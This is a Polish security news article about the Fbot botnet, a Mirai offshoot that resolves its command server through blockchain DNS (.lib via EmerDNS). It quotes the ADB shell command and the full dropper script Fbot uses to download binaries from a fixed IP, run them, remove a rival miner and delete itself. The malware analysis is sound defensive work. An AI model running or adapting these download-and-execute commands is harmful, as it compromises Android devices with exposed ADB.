Nowa wersja botnetu Mirai wykorzystuje technologię Blockchain

18 września, 2018

Z punkt widzenia bezpieczeństwa, publiczna i prywatna decentralizacja systemu przepływu informacji oraz budowa łańcucha bloków zapewniają niskie koszty wdrożenia, utrzymania, anonimowość wymiany danych oraz bardzo duże bezpieczeństwo. Tak duże, że Blockchain jest traktowany przez branżę fintech jako zagrożenie, a nie wynikające z technologii korzyści dla banków i klientów. Jednak niektóre funkcje łańcucha bloków sprawiają, że Blockchain może być użyty do przeprowadzenia ataków nowej generacji. Zaimplementowanie tych funkcji w mechanizmach komunikacji szkodliwego oprogramowania z serwerami C&C (ang. Command and Control) da się wykorzystać do wymiany danych pomiędzy komputerem a serwerem kontrolowanym przez przestępców, z pominięciem serwerów DNS, które są standaryzowane w ramach ogólnoświatowej struktury zarządzania serwerami DNS, nadzorowanymi przez jednostkę IANA, wchodzącą w skład ICANN. W skrócie malware może komunikować się z domenami najwyższego poziomu, które nie są wspierane przez serwery DNS dostawców Internetu.

Jeżeli Blockchain podzielimy na sekcje, podobnie jak pliki wykonywalne PE dla Windows, to każda transakcja w łańcuchu bloków zawiera nagłówek (tzw. Genesis block) danej transakcji, który tak samo jak pozostałe informacje jest integralną częścią bloku danych. Innymi słowy, autor szkodliwego oprogramowania może użyć publicznie dostępnych ID transakcji do ukrycia wiadomości, które będą rozpoznawane przez wirusa jako polecenia do uruchomienia. W ten sposób wirus będzie komunikował się z domenami „nieoficjalnymi” .BIT, .LIB, .EMC, .COIN, .BAZAR i pozostałymi domenami, które są kontrolowane przez rejestratora OpenNIC, ale które nie są rozpoznawane przez instytucję IANA i większość dostawców Internetu. Dodatkowo, pomimo że cały blok łańcucha danych włącznie z sekcją komentarzy jest zaszyfrowany, to istnieje metoda do odszyfrowania tej sekcji i w efekcie wydobycia ukrytej informacji.

Blockchain w komunikacji malware z C&C

Na początku był botnet Satori, który przepoczwarzył się w Mirai. Ten z kolei wypluł z siebie modyfikację w postaci ADB.Miner na bazie którego powstało malware Fbot. Fbot został odkryty przez Chińczyków z Qihoo 360Netlab, którzy też niedawno zaobserwowali, że szkodliwe oprogramowanie instalujące się w systemie Android kopie kryptowalutę Monero.

Nie bez powodu wstęp do Fbota został zapoczątkowany opisem ukrywania informacji w łańcuchu bloków Blockchain, ponieważ malware komunikując się z serwerem C&C, wyszukiwało nazwę domeny musl.lib za pośrednictwem zdecentralizowanego systemu DNS. Domena .LIB najwyższego poziomu nie jest zarejestrowana w ICANN i nie może być rozwiązana przez tradycyjny system DNS. Może być za to rozwiązana przez EmerDNS, który jest łańcuchem bloków DNS, oferujący rejestrację domen takich jak .EMC, .COIN, .LIB, .BAZAR i wiele innych, które są dostępne za pośrednictwem serwera DNS zarządzanego przez operatora OpenNIC.

Blockchain dla malware fbot

Fbot rozprzestrzenia się skanując urządzenia w sieci z otwartym portem 5555, który jest używany przez usługę ADB (Android Debug Bridge). Po uzyskaniu dostępu do urządzenia pobiera skrypt poleceniem:

shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c 

Jedną z funkcji złośliwego skryptu jest przeszukiwanie i usunięcie szkodliwego oprogramowania „com.ufo.miner”, a także procesów powiązanych z koparkami SMI, RIG i XIG. Inną funkcją jest pobranie głównego ładunku odpowiedzialnego za komunikowanie się z serwerem C&C. Trzecią funkcją jest samoczynne usunięcie się.

#!/system/bin/sh

n="arm7 mipsel mips x86 x86_64 aarch64" 
http_server="188.209.52.142"

for i in $n 
do 
    cp /system/bin/sh fbot.$i
    >fbot.$i
    curl hxxp://$http_server/fbot.$i > fbot.$i   #    wget hxxp://$http_server/fbot.$i > fbot.$i
    chmod 777 fbot.$i
    ./fbot.$i
    rm fbot.$i
done

# Cleanup
for i in $n 
do 
    rm fbot.$i
done

pm uninstall com.ufo.miner

# Suicide
rm $0 

Przedstawione szczegóły techniczne pozwalają przypuszczać, że malware zostało zaprogramowane jako ulepszona wersja koparek kryptowalut, ale równie dobrze może to być podjęta przez autora próba ochrony własnych interesów przed innymi przestępcami.

Użytkownicy, którzy chcieliby uzyskać dostęp do domen niewspieranych przez dostawcę Internetu, mogą skorzystać z serwera DNS opartego o technologię Blockchain. Rozszerzenia dla przeglądarek Chrome i Firefox dostępne są na oficjalnej stronie blockchain-dns.info.

Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

Czy ten artykuł był pomocny?

Średnia ocena: 0 / 5. Liczba głosów: 0

guest
0 komentarzy
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]